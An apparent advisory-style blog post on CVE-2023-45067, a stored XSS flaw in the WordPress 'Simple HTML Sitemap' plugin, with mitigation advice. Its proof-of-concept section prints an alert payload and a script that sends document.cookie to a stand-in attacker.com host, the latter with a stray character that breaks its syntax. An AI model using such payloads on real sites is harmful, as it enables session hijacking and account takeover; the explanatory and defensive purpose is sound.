CVE-2023-45067 - How a Simple Stored XSS Flaw in WordPress "Simple HTML Sitemap" Plugin Lets Contributors Hack Your Site

If you use WordPress to run a website, you probably rely on plugins to boost your site's functionality. But sometimes, plugins become the weak link. Today, let's break down CVE-2023-45067, a Stored Cross-Site Scripting (XSS) vulnerability found in the popular "Simple HTML Sitemap" plugin, up to version 2.1. This flaw means even users with just contributor access can inject harmful scripts into your website!

What is CVE-2023-45067?

CVE-2023-45067 affects the Simple HTML Sitemap plugin by Ashish Ajani (versions <= 2.1). It’s a Stored XSS vulnerability exploitable by users with at least Contributor privileges -- not just site admins.

In plain English:
An attacker with contributor access can inject malicious JavaScript code into data that is stored by your WordPress site. When visitors or admins later view certain pages, the code will execute in their browsers. The results can be serious: session hijacking, redirecting users, or even triggering further hacks.

Type: Authenticated Stored Cross-Site Scripting (XSS)

This vulnerability is caused by a lack of proper output sanitization or escaping
in the plugin’s settings. When a user saves the sitemap's description, for example, the plugin does not remove embedded scripts.

A contributor-level user logs in to the WordPress dashboard.

2. They find an area for entering or editing content managed by Simple HTML Sitemap (such as a sitemap description or similar field).

The plugin saves their input directly to the database, without stripping harmful JavaScript inputs.

4. The next time an admin (or site visitor) loads a page that displays the sitemap, that JavaScript is rendered and executed in their browser context.

Proof of Concept (Code Example)

Here's a simple way to demonstrate (NOT use maliciously) how someone could insert XSS payload.

Step 1: As a Contributor, inject code like this

<script>alert('XSS Exploit by CVE-2023-45067!');</script>

An attacker could use a payload like

<script>
fetch('https://attacker.com/steal?cookie='; + document.cookie);
</script>

Further Exploitation: Inject new admin accounts, or silently manipulate site content.

Because contributors are a fairly low-level user role, this flaw significantly weakens standard WordPress privilege barriers.

If you use this plugin

1. Update ASAP: Check if a patched version >2.1 is available. Plugin page

Review User Roles: Remove unnecessary contributor accounts.

3. Sanitize Inputs: Until patched, consider using security plugins like Wordfence or WP Cerber that filter out XSS payloads.

References

- WPScan Advisory
- Official Plugin Page
- NVD CVE-2023-45067 Entry
- XSS Explained (OWASP)


Bottom line:
Stored XSS like in CVE-2023-45067 is dangerous and easy to abuse. If you manage a WordPress site using "Simple HTML Sitemap," update the plugin immediately and review who has contributor access. Stay safe – always keep plugins up to date!

Timeline

Published on: 10/18/2023 13:15:09 UTC
Last modified on: 10/25/2023 17:22:34 UTC